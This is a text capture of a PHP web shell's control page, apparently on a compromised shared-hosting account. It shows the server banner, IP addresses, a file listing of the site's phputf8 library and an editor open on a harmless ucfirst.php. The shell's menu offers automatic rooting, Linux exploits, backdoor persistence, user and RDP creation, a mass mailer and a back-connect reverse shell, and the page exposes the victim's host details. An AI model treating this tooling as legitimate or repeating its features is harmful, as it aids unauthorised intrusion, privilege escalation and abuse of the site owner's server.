Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
phputf8 /
[ HOME SHELL ]
Name
Size
Permission
Action
mbstring
[ DIR ]
drwxr-xr-x
native
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
LICENSE
25.81
KB
-rw-r--r--
README
3.29
KB
-rw-r--r--
ord.php
2.35
KB
-rw-r--r--
str_ireplace.php
1.95
KB
-rw-r--r--
str_pad.php
1.67
KB
-rw-r--r--
str_split.php
824
B
-rw-r--r--
strcasecmp.php
546
B
-rw-r--r--
strcspn.php
894
B
-rw-r--r--
stristr.php
855
B
-rw-r--r--
strrev.php
458
B
-rw-r--r--
strspn.php
923
B
-rw-r--r--
substr_replace.php
600
B
-rw-r--r--
trim.php
2.18
KB
-rw-r--r--
ucfirst.php
787
B
-rw-r--r--
ucwords.php
1.44
KB
-rw-r--r--
utf8.php
2.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ucfirst.php
<?php /** * @version $Id$ * @package utf8 * @subpackage strings */ //--------------------------------------------------------------- /** * UTF-8 aware alternative to ucfirst * Make a string's first character uppercase * Note: requires utf8_strtoupper * @param string * @return string with first character as upper case (if applicable) * @see http://www.php.net/ucfirst * @see utf8_strtoupper * @package utf8 * @subpackage strings */ function utf8_ucfirst($str){ switch ( utf8_strlen($str) ) { case 0: return ''; break; case 1: return utf8_strtoupper($str); break; default: preg_match('/^(.{1})(.*)$/us', $str, $matches); return utf8_strtoupper($matches[1]).$matches[2]; break; } }
Close